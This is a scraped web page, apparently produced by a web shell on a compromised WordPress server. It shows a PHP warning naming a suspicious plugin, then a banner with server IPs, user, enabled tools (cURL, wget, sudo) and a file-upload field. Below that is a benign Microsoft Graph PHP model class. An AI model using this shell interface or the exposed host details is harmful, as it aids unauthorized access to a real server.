Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/ |
Upload File : |
<?php
/**
* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
*
* CustomCalloutExtension File
* PHP version 7
*
* @category Library
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* CustomCalloutExtension class
*
* @category Model
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
class CustomCalloutExtension extends Entity
{
/**
* Gets the authenticationConfiguration
* Configuration for securing the API call to the logic app. For example, using OAuth client credentials flow.
*
* @return CustomExtensionAuthenticationConfiguration|null The authenticationConfiguration
*/
public function getAuthenticationConfiguration()
{
if (array_key_exists("authenticationConfiguration", $this->_propDict)) {
if (is_a($this->_propDict["authenticationConfiguration"], "\Microsoft\Graph\Model\CustomExtensionAuthenticationConfiguration") || is_null($this->_propDict["authenticationConfiguration"])) {
return $this->_propDict["authenticationConfiguration"];
} else {
$this->_propDict["authenticationConfiguration"] = new CustomExtensionAuthenticationConfiguration($this->_propDict["authenticationConfiguration"]);
return $this->_propDict["authenticationConfiguration"];
}
}
return null;
}
/**
* Sets the authenticationConfiguration
* Configuration for securing the API call to the logic app. For example, using OAuth client credentials flow.
*
* @param CustomExtensionAuthenticationConfiguration $val The authenticationConfiguration
*
* @return CustomCalloutExtension
*/
public function setAuthenticationConfiguration($val)
{
$this->_propDict["authenticationConfiguration"] = $val;
return $this;
}
/**
* Gets the clientConfiguration
* HTTP connection settings that define how long Azure AD can wait for a connection to a logic app, how many times you can retry a timed-out connection and the exception scenarios when retries are allowed.
*
* @return CustomExtensionClientConfiguration|null The clientConfiguration
*/
public function getClientConfiguration()
{
if (array_key_exists("clientConfiguration", $this->_propDict)) {
if (is_a($this->_propDict["clientConfiguration"], "\Microsoft\Graph\Model\CustomExtensionClientConfiguration") || is_null($this->_propDict["clientConfiguration"])) {
return $this->_propDict["clientConfiguration"];
} else {
$this->_propDict["clientConfiguration"] = new CustomExtensionClientConfiguration($this->_propDict["clientConfiguration"]);
return $this->_propDict["clientConfiguration"];
}
}
return null;
}
/**
* Sets the clientConfiguration
* HTTP connection settings that define how long Azure AD can wait for a connection to a logic app, how many times you can retry a timed-out connection and the exception scenarios when retries are allowed.
*
* @param CustomExtensionClientConfiguration $val The clientConfiguration
*
* @return CustomCalloutExtension
*/
public function setClientConfiguration($val)
{
$this->_propDict["clientConfiguration"] = $val;
return $this;
}
/**
* Gets the description
* Description for the customCalloutExtension object.
*
* @return string|null The description
*/
public function getDescription()
{
if (array_key_exists("description", $this->_propDict)) {
return $this->_propDict["description"];
} else {
return null;
}
}
/**
* Sets the description
* Description for the customCalloutExtension object.
*
* @param string $val The description
*
* @return CustomCalloutExtension
*/
public function setDescription($val)
{
$this->_propDict["description"] = $val;
return $this;
}
/**
* Gets the displayName
* Display name for the customCalloutExtension object.
*
* @return string|null The displayName
*/
public function getDisplayName()
{
if (array_key_exists("displayName", $this->_propDict)) {
return $this->_propDict["displayName"];
} else {
return null;
}
}
/**
* Sets the displayName
* Display name for the customCalloutExtension object.
*
* @param string $val The displayName
*
* @return CustomCalloutExtension
*/
public function setDisplayName($val)
{
$this->_propDict["displayName"] = $val;
return $this;
}
/**
* Gets the endpointConfiguration
* The type and details for configuring the endpoint to call the logic app's workflow.
*
* @return CustomExtensionEndpointConfiguration|null The endpointConfiguration
*/
public function getEndpointConfiguration()
{
if (array_key_exists("endpointConfiguration", $this->_propDict)) {
if (is_a($this->_propDict["endpointConfiguration"], "\Microsoft\Graph\Model\CustomExtensionEndpointConfiguration") || is_null($this->_propDict["endpointConfiguration"])) {
return $this->_propDict["endpointConfiguration"];
} else {
$this->_propDict["endpointConfiguration"] = new CustomExtensionEndpointConfiguration($this->_propDict["endpointConfiguration"]);
return $this->_propDict["endpointConfiguration"];
}
}
return null;
}
/**
* Sets the endpointConfiguration
* The type and details for configuring the endpoint to call the logic app's workflow.
*
* @param CustomExtensionEndpointConfiguration $val The endpointConfiguration
*
* @return CustomCalloutExtension
*/
public function setEndpointConfiguration($val)
{
$this->_propDict["endpointConfiguration"] = $val;
return $this;
}
}